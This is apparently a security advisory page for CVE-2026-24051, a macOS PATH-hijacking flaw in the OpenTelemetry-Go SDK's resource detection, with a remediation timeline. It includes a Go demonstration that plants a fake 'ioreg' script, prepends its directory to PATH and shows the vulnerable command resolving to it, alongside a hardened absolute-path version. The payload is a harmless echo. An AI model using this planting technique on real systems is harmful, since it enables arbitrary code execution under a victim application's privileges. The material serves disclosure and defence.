CVE-2026-24051
Severity: HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
OpenTelemetry-Go is the Go implementation of OpenTelemetry. OpenTelemetry Go SDK versions v1.20.0 through v1.39.0 are vulnerable to path hijacking (untrusted search path, CWE-426) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command by its bare name, so the binary is resolved through the PATH search rather than by an absolute path. A local attacker who can modify the PATH environment variable seen by the application can place their own ioreg executable ahead of the system one and achieve arbitrary code execution (ACE) with the privileges of the application. A fix was released in v1.40.0.
Analysis
Arbitrary code execution in OpenTelemetry Go SDK versions 1.20.0 through 1.39.0 on macOS results from insecure PATH resolution when executing the ioreg system command during resource detection. A local attacker with the ability to modify the PATH environment variable can hijack the command search path and execute arbitrary code with the privileges of the affected application. …
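The following is an added example, not code from the OpenTelemetry-Go project or from this advisory. It reproduces the condition the description and analysis above refer to: a command built from the bare name "ioreg" is resolved through PATH, so prepending an attacker-controlled directory to PATH makes the SDK run the attacker's binary, while a command built from an absolute path never consults PATH. The ioreg arguments, the absolute path /usr/sbin/ioreg, and the shell-script payload are the example's own assumptions; the page does not quote the SDK's exact invocation or the v1.40.0 fix. The example runs on Linux as well, because the hijack is a property of exec.Command's lookup, not of macOS.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
)

// ioregAbsPath is where ioreg lives on a stock macOS install. Pinning it is this
// example's hardening choice (an assumption), not a quote of the v1.40.0 fix.
const ioregAbsPath = "/usr/sbin/ioreg"

// ioregArgs is an illustrative host-ID query; the advisory does not state the
// exact flags the SDK passes, so treat these as an assumption.
var ioregArgs = []string{"-rd1", "-c", "IOPlatformExpertDevice"}

// vulnerableIoregCmd is the pattern the advisory describes: exec.Command does a
// PATH lookup whenever the command name contains no path separator.
func vulnerableIoregCmd() *exec.Cmd {
	return exec.Command("ioreg", ioregArgs...)
}

// hardenedIoregCmd builds the command from an absolute path, which exec.Command
// uses verbatim, so PATH is never consulted. The IsAbs check guards against the
// constant being edited back into a bare name.
func hardenedIoregCmd() (*exec.Cmd, error) {
	if !filepath.IsAbs(ioregAbsPath) {
		return nil, fmt.Errorf("refusing non-absolute command path %q", ioregAbsPath)
	}
	return exec.Command(ioregAbsPath, ioregArgs...), nil
}

// plantFakeIoreg writes an attacker-controlled executable named "ioreg" into dir.
// The payload is a constructed shell script standing in for real malicious code.
func plantFakeIoreg(dir string) (string, error) {
	p := filepath.Join(dir, "ioreg")
	script := "#!/bin/sh\necho HIJACKED by $0\n"
	if err := os.WriteFile(p, []byte(script), 0o755); err != nil {
		return "", err
	}
	return p, nil
}

// HijackResult records which binary each command form would execute.
type HijackResult struct {
	VulnPath   string // resolved by PATH search: the attacker's file
	HardPath   string // fixed absolute path: unaffected by PATH
	VulnOutput string // what actually ran when the vulnerable form was executed
	RunErr     error  // non-nil if the planted script could not be run (e.g. noexec tmp)
}

// Hijack plants the fake ioreg, prepends attackerDir to PATH (restored on return),
// and reports what the vulnerable and hardened forms resolve to.
func Hijack(attackerDir string) (HijackResult, error) {
	var res HijackResult
	if _, err := plantFakeIoreg(attackerDir); err != nil {
		return res, err
	}
	oldPath := os.Getenv("PATH")
	defer os.Setenv("PATH", oldPath)
	os.Setenv("PATH", attackerDir+string(os.PathListSeparator)+oldPath)

	vuln := vulnerableIoregCmd()
	res.VulnPath = vuln.Path // exec.Command already resolved it via PATH

	hard, err := hardenedIoregCmd()
	if err != nil {
		return res, err
	}
	res.HardPath = hard.Path

	out, runErr := vuln.CombinedOutput()
	res.VulnOutput = strings.TrimSpace(string(out))
	res.RunErr = runErr
	return res, nil
}

func main() {
	dir, err := os.MkdirTemp("", "attacker")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	res, err := Hijack(dir)
	if err != nil {
		panic(err)
	}
	fmt.Printf("vulnerable form executes: %s\n", res.VulnPath)
	fmt.Printf("hardened form executes:   %s\n", res.HardPath)
	fmt.Printf("vulnerable form output:   %q (err=%v)\n", res.VulnOutput, res.RunErr)
}
```

The check a practitioner wants from this is the pair of resolved paths: with the attacker's directory first in PATH, the vulnerable form's cmd.Path points into that directory, while the hardened form's cmd.Path is unchanged. In a real deployment the same property can be verified by auditing every exec.Command call in the dependency tree for bare command names and by keeping PATH out of the control of lower-privileged local users.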
Remediation
Within 24 hours: Inventory all systems running OpenTelemetry-Go SDK versions 1.20.0 through 1.39.0, particularly macOS-based infrastructure and developer workstations, including Go binaries that vendor the SDK as a dependency. Within 7 days: Upgrade affected builds to v1.40.0 or later, redeploy, and verify that the deployed binaries no longer link the vulnerable versions. …
External POC / Exploit Code
GHSA-9h8m-3fm2-qjrq